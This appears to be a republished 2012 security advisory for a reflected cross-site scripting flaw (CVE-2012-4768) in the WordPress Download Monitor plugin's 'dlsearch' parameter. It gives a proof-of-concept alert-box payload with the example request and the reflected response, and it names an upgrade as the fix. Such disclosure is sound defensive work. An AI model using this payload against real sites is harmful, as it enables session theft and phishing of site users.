Wordpress Download Monitor Download Page Cross-Site Scripting

2012.09.09
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

/-----------------------------------------------------------------\ | Wordpress Download Monitor - Download Page Cross-Site Scripting | \-----------------------------------------------------------------/ Summary ======= Wordpress Download Monitor 3.3.5.7 is subject to a cross-site scripting vulnerability. The 'dlsearch' parameter is not sufficiently sanitised before being written to pages including the '[download_page]' shortcode. An attacker could distribute a malicious URL as part of a phishing campaign. Users following the link would trigger this vulnerability which could potentially steal session cookies, redirect the user to a malicious URL or download malware onto their machine. CVE number: CVE-2012-4768 Impact: Medium Vendor homepage: http://mikejolley.com/ Vendor notified: 30/08/2012 Vendor fixed: 30/08/2012 Credit: Chris Cooper and Joseph Sheridan of ReactionIS This advisory is posted at: http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xss.html Affected Products ======== ======== Confirmed in Wordpress Download Monitor 3.3.5.7. Versions prior to 3.3.5.9 may also be affected. Details =======cv The 'dlsearch' parameter, written to any page/post including the '[download_page]' shortcode, was found to be subject to a cross-site scripting vulnerability. It was possible to inject arbitrary Javascript code into the parameter which is passed into the page content without sanitisation. Injecting the following Javascript code will trigger the vulnerability, causing the page to return a Javascript alert box: "><script>alert('xsstest')</script> --- Example Request: +--------------- GET /wp/?dlsearch="><script>alert('xsstest')</script> HTTP/1.1 Host: 192.168.0.6 --- Example Response: +---------------- --- SNIP --- <form id="download-page-search" action="" method="post"> <p><label for="dlsearch">Search Downloads:</label> <input type="text" name="dlsearch" id="dlsearch" value=""><script>alert('xsstest') </script>" /><input class="search_submit" type="submit" value="Go" /><input type="hidden" name="page_id" value="2" /></p></form><h3>Results found for <em>""><script>alert('xsstest')</script>"</em> <small><a href="http://192.168.0.6/wp/">&laquo;&nbsp;Downloads</a></small></h3> --- SNIP --- Impact ====== An attacker might entice users to follow a malicious URL, causing Javascript code to execute in their browser, potentially stealing session cookies, redirecting the user to a malicious URL or downloading malware onto their machine. Solution ======== Upgrade to Wordpress Download Monitor 3.3.5.9. Distribution ============ In addition to posting on the website, a text version of this notice has been posted to the following e-mail and Usenet news recipients. * bugtraq () securityfocus com * full-disclosure () lists grok org uk Future updates of this advisory, if any, will be placed on the ReactionIS corporate website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the URL below for any updates: http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xss.html === Reaction Information Security Lombard House Business Centre, Suite 117, 12-17 Upper Bridge Street, Canterbury, Kent, CT1 2NF Phone: +44 (0)1227 785050 Email: research () reactionis {dot} co {dot} uk Web: http://www.reactionpenetrationtesting.co.uk

References:

http://mikejolley.com/
http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xss.html
http://www.reactionpenetrationtesting.co.uk


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top